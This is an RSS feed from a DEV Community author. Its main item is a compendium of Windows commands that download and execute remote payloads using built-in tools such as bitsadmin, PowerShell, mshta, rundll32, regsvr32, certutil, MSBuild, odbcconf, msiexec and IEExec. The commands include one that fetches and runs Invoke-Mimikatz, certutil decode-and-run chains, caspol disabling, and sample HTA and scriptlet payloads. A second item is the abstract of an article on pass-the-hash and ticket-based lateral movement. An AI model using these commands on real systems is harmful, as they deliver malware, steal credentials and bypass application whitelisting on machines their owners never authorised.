<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Excalibra</title>
    <description>The latest articles on DEV Community by Excalibra (@excalibra).</description>
    <link>https://dev.to/excalibra</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F2465115%2F44e01ea7-d2d5-4532-8d8a-4a94ebf19e42.jpg</url>
      <title>DEV Community: Excalibra</title>
      <link>https://dev.to/excalibra</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/excalibra"/>
    <language>en</language>
    <item>
      <title>A Comprehensive Compendium of Windows Download and Execution Commands</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Wed, 24 Jun 2026 11:41:24 +0000</pubDate>
      <link>https://dev.to/excalibra/a-comprehensive-compendium-of-windows-download-and-execution-commands-3hje</link>
      <guid>https://dev.to/excalibra/a-comprehensive-compendium-of-windows-download-and-execution-commands-3hje</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Article Abstract:&lt;/strong&gt; This article presents a systematic compilation of methods for downloading and executing files on Windows systems using various built-in commands, including bitsadmin, PowerShell, mshta, and others. These techniques are applicable to Windows 7 and later versions.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;1. bitsadmin Command (Windows 7 and Above)&lt;/li&gt;
&lt;li&gt;2. PowerShell Command Download and Execution (Windows 7 and Above)&lt;/li&gt;
&lt;li&gt;3. mshta Command Download and Execution&lt;/li&gt;
&lt;li&gt;4. rundll32 Command Download and Execution&lt;/li&gt;
&lt;li&gt;5. regasm Command from .NET Framework&lt;/li&gt;
&lt;li&gt;6. CMD Remote Command Download&lt;/li&gt;
&lt;li&gt;7. regsvr32 Command Download and Execution&lt;/li&gt;
&lt;li&gt;8. certutil Command Download and Execution&lt;/li&gt;
&lt;li&gt;9. MSBuild Command from .NET Framework&lt;/li&gt;
&lt;li&gt;10. odbcconf Command Download and Execution&lt;/li&gt;
&lt;li&gt;11. cscript Script Remote Command Download and Execution&lt;/li&gt;
&lt;li&gt;12. pubprn.vbs Download and Execution Command&lt;/li&gt;
&lt;li&gt;13. Native Windows copy Command&lt;/li&gt;
&lt;li&gt;14. IEXPLORE.EXE Command Download and Execution (Requires IE 0-day)&lt;/li&gt;
&lt;li&gt;15. IEExec Command Download and Execution&lt;/li&gt;
&lt;li&gt;16. msiexec Command Download and Execution&lt;/li&gt;
&lt;li&gt;17. GreatSCT Download and Execution Project&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  1. bitsadmin Command (Windows 7 and Above)
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;bitsadmin&lt;/code&gt; utility itself only downloads a file to a specified path on the local system; any execution has to be chained afterwards as a separate command, as the second example does.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;bitsadmin /transfer myDownLoadJob /download /priority normal &lt;span class="s2"&gt;"http://img5.cache.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg"&lt;/span&gt; &lt;span class="s2"&gt;"d:&lt;/span&gt;&lt;span class="se"&gt;\a&lt;/span&gt;&lt;span class="s2"&gt;bc.jpg"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;bitsadmin /transfer d90f &amp;lt;http://site.com/a&amp;gt; %APPDATA%&lt;span class="se"&gt;\d&lt;/span&gt;90f.exe&amp;amp;%APPDATA%&lt;span class="se"&gt;\d&lt;/span&gt;90f.exe&amp;amp;del %APPDATA%&lt;span class="se"&gt;\d&lt;/span&gt;90f.exe
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  2. PowerShell Command Download and Execution (Windows 7 and Above)
&lt;/h2&gt;

&lt;p&gt;PowerShell provides powerful capabilities for downloading and executing scripts and binaries directly from remote sources.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;powershell IEX &lt;span class="o"&gt;(&lt;/span&gt;New-Object Net.WebClient&lt;span class="o"&gt;)&lt;/span&gt;.DownloadString&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'&amp;lt;https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1&amp;gt;'&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; Invoke-Mimikatz
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;powershell &lt;span class="nt"&gt;-exec&lt;/span&gt; bypass &lt;span class="nt"&gt;-f&lt;/span&gt; &lt;span class="se"&gt;\\&lt;/span&gt;webdavserver&lt;span class="se"&gt;\f&lt;/span&gt;older&lt;span class="se"&gt;\p&lt;/span&gt;ayload.ps1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;powershell &lt;span class="o"&gt;(&lt;/span&gt;new-object System.Net.WebClient&lt;span class="o"&gt;)&lt;/span&gt;.DownloadFile&lt;span class="o"&gt;(&lt;/span&gt; &lt;span class="s1"&gt;'http://192.168.168.183/1.exe'&lt;/span&gt;,&lt;span class="s1"&gt;'C:\1111111111111.exe'&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;powershell &lt;span class="nt"&gt;-w&lt;/span&gt; hidden &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="o"&gt;(&lt;/span&gt;new-object System.Net.WebClient&lt;span class="o"&gt;)&lt;/span&gt;.Downloadfile&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'http://img5.cache.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg'&lt;/span&gt;,&lt;span class="s1"&gt;'d:\\1.jpg'&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  3. mshta Command Download and Execution
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;mshta&lt;/code&gt; command executes HTML Application (HTA) files, which can contain VBScript or JScript that performs download and execution.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;mshta vbscript:Close&lt;span class="o"&gt;(&lt;/span&gt;Execute&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"GetObject(""script:http://webserver/payload.sct"")"&lt;/span&gt;&lt;span class="o"&gt;))&lt;/span&gt;

mshta http://webserver/payload.hta

mshta &lt;span class="se"&gt;\\&lt;/span&gt;webdavserver&lt;span class="se"&gt;\f&lt;/span&gt;older&lt;span class="se"&gt;\p&lt;/span&gt;ayload.hta
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Sample payload.hta:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight html"&gt;&lt;code&gt;&lt;span class="nt"&gt;&amp;lt;HTML&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;meta&lt;/span&gt; &lt;span class="na"&gt;http-equiv=&lt;/span&gt;&lt;span class="s"&gt;"Content-Type"&lt;/span&gt; &lt;span class="na"&gt;content=&lt;/span&gt;&lt;span class="s"&gt;"text/html; charset=utf-8"&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;HEAD&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;script &lt;/span&gt;&lt;span class="na"&gt;language=&lt;/span&gt;&lt;span class="s"&gt;"VBScript"&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="nx"&gt;Window&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;ReSizeTo&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;
&lt;span class="nx"&gt;Window&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;moveTo&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;2000&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;2000&lt;/span&gt;
&lt;span class="nb"&gt;Set&lt;/span&gt; &lt;span class="nx"&gt;objShell&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;CreateObject&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;Wscript.Shell&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="nx"&gt;objShell&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;Run&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;calc.exe&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;
&lt;span class="nb"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;close&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/script&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;body&amp;gt;&lt;/span&gt;
demo
&lt;span class="nt"&gt;&amp;lt;/body&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/HEAD&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/HTML&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  4. rundll32 Command Download and Execution
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;rundll32&lt;/code&gt; utility can execute functions exported from DLLs, including those hosted on remote WebDAV shares.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;rundll32 &lt;span class="se"&gt;\\&lt;/span&gt;webdavserver&lt;span class="se"&gt;\f&lt;/span&gt;older&lt;span class="se"&gt;\p&lt;/span&gt;ayload.dll,entrypoint

rundll32.exe javascript:&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;.&lt;/span&gt;&lt;span class="se"&gt;\m&lt;/span&gt;&lt;span class="s2"&gt;shtml,RunHTMLApplication"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="nv"&gt;o&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;GetObject&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"script:http://webserver/payload.sct"&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;window.close&lt;span class="o"&gt;()&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Reference:&lt;/strong&gt; &lt;a href="https://github.com/3gstudent/Javascript-Backdoor" rel="noopener noreferrer"&gt;https://github.com/3gstudent/Javascript-Backdoor&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  5. regasm Command from .NET Framework
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;regasm.exe&lt;/code&gt; tool, part of the .NET Framework, can be used to execute managed DLLs from remote locations.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\M&lt;/span&gt;icrosoft.NET&lt;span class="se"&gt;\F&lt;/span&gt;ramework64&lt;span class="se"&gt;\v&lt;/span&gt;4.0.30319&lt;span class="se"&gt;\r&lt;/span&gt;egasm.exe /u &lt;span class="se"&gt;\\&lt;/span&gt;webdavserver&lt;span class="se"&gt;\f&lt;/span&gt;older&lt;span class="se"&gt;\p&lt;/span&gt;ayload.dll
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  6. CMD Remote Command Download
&lt;/h2&gt;

&lt;p&gt;The Windows Command Prompt can directly read and execute commands from a remote batch file.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;cmd.exe /k &amp;lt; &lt;span class="se"&gt;\\&lt;/span&gt;webdavserver&lt;span class="se"&gt;\f&lt;/span&gt;older&lt;span class="se"&gt;\b&lt;/span&gt;atchfile.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  7. regsvr32 Command Download and Execution
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;regsvr32&lt;/code&gt; utility can register and execute COM objects from remote scriptlet files.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll

regsvr32 /u /n /s /i:&lt;span class="se"&gt;\\&lt;/span&gt;webdavserver&lt;span class="se"&gt;\f&lt;/span&gt;older&lt;span class="se"&gt;\p&lt;/span&gt;ayload.sct scrobj.dll

regsvr32 /u /s /i:&amp;lt;http://site.com/js.png&amp;gt; scrobj.dll
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Sample js.png (Scriptlet):&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight xml"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?XML version="1.0"?&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;scriptlet&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;registration&lt;/span&gt;
    &lt;span class="na"&gt;progid=&lt;/span&gt;&lt;span class="s"&gt;"ShortJSRAT"&lt;/span&gt;
    &lt;span class="na"&gt;classid=&lt;/span&gt;&lt;span class="s"&gt;"{10001111-0000-0000-0000-0000FEEDACDC}"&lt;/span&gt; &lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="c"&gt;&amp;lt;!-- Learn from Casey Smith @subTee --&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;script&lt;/span&gt; &lt;span class="na"&gt;language=&lt;/span&gt;&lt;span class="s"&gt;"JScript"&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
        &lt;span class="cp"&gt;&amp;lt;![CDATA[
            ps = "cmd.exe /c calc.exe";
            new ActiveXObject("WScript.Shell").Run(ps,0,true);
        ]]&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;/script&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/registration&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/scriptlet&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  8. certutil Command Download and Execution
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;certutil&lt;/code&gt; utility, primarily used for certificate management, can also download files and decode Base64-encoded content.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;certutil &lt;span class="nt"&gt;-urlcache&lt;/span&gt; &lt;span class="nt"&gt;-split&lt;/span&gt; &lt;span class="nt"&gt;-f&lt;/span&gt; http://webserver/payload payload
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;certutil &lt;span class="nt"&gt;-urlcache&lt;/span&gt; &lt;span class="nt"&gt;-split&lt;/span&gt; &lt;span class="nt"&gt;-f&lt;/span&gt; http://webserver/payload.b64 payload.b64 &amp;amp; certutil &lt;span class="nt"&gt;-decode&lt;/span&gt; payload.b64 payload.dll &amp;amp; C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\M&lt;/span&gt;icrosoft.NET&lt;span class="se"&gt;\F&lt;/span&gt;ramework64&lt;span class="se"&gt;\v&lt;/span&gt;4.0.30319&lt;span class="se"&gt;\I&lt;/span&gt;nstallUtil /logfile&lt;span class="o"&gt;=&lt;/span&gt; /LogToConsole&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;false&lt;/span&gt; /u payload.dll
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;certutil &lt;span class="nt"&gt;-urlcache&lt;/span&gt; &lt;span class="nt"&gt;-split&lt;/span&gt; &lt;span class="nt"&gt;-f&lt;/span&gt; http://webserver/payload.b64 payload.b64 &amp;amp; certutil &lt;span class="nt"&gt;-decode&lt;/span&gt; payload.b64 payload.exe &amp;amp; payload.exe
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;certutil &lt;span class="nt"&gt;-urlcache&lt;/span&gt; &lt;span class="nt"&gt;-split&lt;/span&gt; &lt;span class="nt"&gt;-f&lt;/span&gt; http://site.com/a a.exe &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; a.exe &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; del a.exe &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; certutil &lt;span class="nt"&gt;-urlcache&lt;/span&gt; &lt;span class="nt"&gt;-split&lt;/span&gt; &lt;span class="nt"&gt;-f&lt;/span&gt; http://192.168.254.102:80/a delete
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  9. MSBuild Command from .NET Framework
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;MSBuild&lt;/code&gt; tool, part of the .NET Framework, executes tasks defined in XML project files, so a project file fetched from a remote share can be used to run code on the local machine.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;cmd /V /c &lt;span class="s2"&gt;"set MB="&lt;/span&gt;C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\M&lt;/span&gt;icrosoft.NET&lt;span class="se"&gt;\F&lt;/span&gt;ramework64&lt;span class="se"&gt;\v&lt;/span&gt;4.0.30319&lt;span class="se"&gt;\M&lt;/span&gt;SBuild.exe&lt;span class="s2"&gt;" &amp;amp; !MB! /noautoresponse /preprocess &lt;/span&gt;&lt;span class="se"&gt;\\&lt;/span&gt;&lt;span class="s2"&gt;webdavserver&lt;/span&gt;&lt;span class="se"&gt;\f&lt;/span&gt;&lt;span class="s2"&gt;older&lt;/span&gt;&lt;span class="se"&gt;\p&lt;/span&gt;&lt;span class="s2"&gt;ayload.xml &amp;gt; payload.xml &amp;amp; !MB! payload.xml"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  10. odbcconf Command Download and Execution
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;odbcconf&lt;/code&gt; utility can be used to load and register a DLL from a remote path via its &lt;code&gt;regsvr&lt;/code&gt; command.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;odbcconf /s /a &lt;span class="o"&gt;{&lt;/span&gt;regsvr &lt;span class="se"&gt;\\&lt;/span&gt;webdavserver&lt;span class="se"&gt;\f&lt;/span&gt;older&lt;span class="se"&gt;\p&lt;/span&gt;ayload_dll.txt&lt;span class="o"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  11. cscript Script Remote Command Download and Execution
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;cscript&lt;/code&gt; command executes VBScript or JScript scripts, which can be hosted remotely.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;cscript //E:jscript &lt;span class="se"&gt;\\&lt;/span&gt;webdavserver&lt;span class="se"&gt;\f&lt;/span&gt;older&lt;span class="se"&gt;\p&lt;/span&gt;ayload.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Sample downfile.vbs:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;' Set your settings
strFileURL = "http://www.it1.net/images/it1_logo2.jpg"
strHDLocation = "c:\logo.jpg"

' Fetch the file
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()

If objXMLHTTP.Status = 200 Then
    Set objADOStream = CreateObject("ADODB.Stream")
    objADOStream.Open
    objADOStream.Type = 1 'adTypeBinary

    objADOStream.Write objXMLHTTP.ResponseBody
    objADOStream.Position = 0 'Set the stream position to the start

    Set objFSO = Createobject("Scripting.FileSystemObject")
    If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
    Set objFSO = Nothing

    objADOStream.SaveToFile strHDLocation
    objADOStream.Close
    Set objADOStream = Nothing
End if

Set objXMLHTTP = Nothing
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Execution Command:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;cscript downfile.vbs
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  12. pubprn.vbs Download and Execution Command
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;pubprn.vbs&lt;/code&gt; script, part of Windows printing administration, can execute remote scriptlet files.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;cscript /b C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\S&lt;/span&gt;ystem32&lt;span class="se"&gt;\P&lt;/span&gt;rinting_Admin_Scripts&lt;span class="se"&gt;\z&lt;/span&gt;h-CN&lt;span class="se"&gt;\p&lt;/span&gt;ubprn.vbs 127.0.0.1 script:&amp;lt;https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  13. Native Windows copy Command
&lt;/h2&gt;

&lt;p&gt;The built-in &lt;code&gt;copy&lt;/code&gt; and &lt;code&gt;xcopy&lt;/code&gt; commands can copy files to and from remote SMB shares, as the two examples show.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;copy &lt;span class="se"&gt;\\&lt;/span&gt;x.x.x.x&lt;span class="se"&gt;\x&lt;/span&gt;x&lt;span class="se"&gt;\p&lt;/span&gt;oc.exe
xcopy d:&lt;span class="se"&gt;\t&lt;/span&gt;est.exe &lt;span class="se"&gt;\\&lt;/span&gt;x.x.x.x&lt;span class="se"&gt;\t&lt;/span&gt;est.exe
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  14. IEXPLORE.EXE Command Download and Execution (Requires IE 0-day)
&lt;/h2&gt;

&lt;p&gt;Internet Explorer can be launched from the command line to open a remote URL; this only results in execution if a browser vulnerability is exploited, as the heading notes.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="s2"&gt;"C:&lt;/span&gt;&lt;span class="se"&gt;\P&lt;/span&gt;&lt;span class="s2"&gt;rogram Files&lt;/span&gt;&lt;span class="se"&gt;\I&lt;/span&gt;&lt;span class="s2"&gt;nternet Explorer&lt;/span&gt;&lt;span class="se"&gt;\I&lt;/span&gt;&lt;span class="s2"&gt;EXPLORE.EXE"&lt;/span&gt; &amp;lt;http://site.com/exp&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  15. IEExec Command Download and Execution
&lt;/h2&gt;

&lt;p&gt;&lt;code&gt;IEExec.exe&lt;/code&gt;, part of the .NET Framework, can execute managed code from remote locations.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\M&lt;/span&gt;icrosoft.NET&lt;span class="se"&gt;\F&lt;/span&gt;ramework&lt;span class="se"&gt;\v&lt;/span&gt;2.0.50727&amp;gt; caspol &lt;span class="nt"&gt;-s&lt;/span&gt; off
C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\M&lt;/span&gt;icrosoft.NET&lt;span class="se"&gt;\F&lt;/span&gt;ramework&lt;span class="se"&gt;\v&lt;/span&gt;2.0.50727&amp;gt; IEExec &amp;lt;http://site.com/files/test64.exe&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Reference:&lt;/strong&gt; &lt;a href="https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/" rel="noopener noreferrer"&gt;https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  16. msiexec Command Download and Execution
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;msiexec&lt;/code&gt; installer can execute MSI packages hosted on remote servers.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;msiexec /q /i &amp;lt;http://site.com/payloads/calc.png&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  17. GreatSCT Download and Execution Project
&lt;/h2&gt;

&lt;p&gt;GreatSCT is a project that provides various techniques for bypassing application whitelisting and executing payloads.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Reference:&lt;/strong&gt; &lt;a href="https://github.com/GreatSCT" rel="noopener noreferrer"&gt;https://github.com/GreatSCT&lt;/a&gt;&lt;/p&gt;

</description>
      <category>windows</category>
      <category>security</category>
      <category>cybersecurity</category>
    </item>
    <item>
      <title>Domain Lateral Movement: PTH, PTK, and PTT Hash-Based Credential Transfer</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Wed, 24 Jun 2026 11:09:24 +0000</pubDate>
      <link>https://dev.to/excalibra/domain-lateral-movement-pth-ptk-and-ptt-hash-based-credential-transfer-313c</link>
      <guid>https://dev.to/excalibra/domain-lateral-movement-pth-ptk-and-ptt-hash-based-credential-transfer-313c</guid>
      <description>&lt;p&gt;&lt;strong&gt;Abstract:&lt;/strong&gt; This article delineates the operational workflow of the Kerberos protocol within a domain environment, including the process by which a client obtains a Ticket-Granting Ticket (TGT) and its significance in intranet security. It critically examines three lateral movement techniques—Pass the Hash (PTH), Pass the Ticket (PTT), and Pass the Key (PTK)—and evaluates the ramifications of NTLM and LM Hash authentication on Windows systems. The discussion extends to the security patch KB2871997, designed to mitigate PTH attacks. Through case studies, the utilisation of the Mimikatz tool for credential extraction and injection is demonstrated, alongside an analysis of the MS14-068 vulnerability and the concepts of Golden and Silver Tickets. The practical application of the Ladon intranet penetration testing framework for information gathering and lateral movement is also considered.&lt;/p&gt;

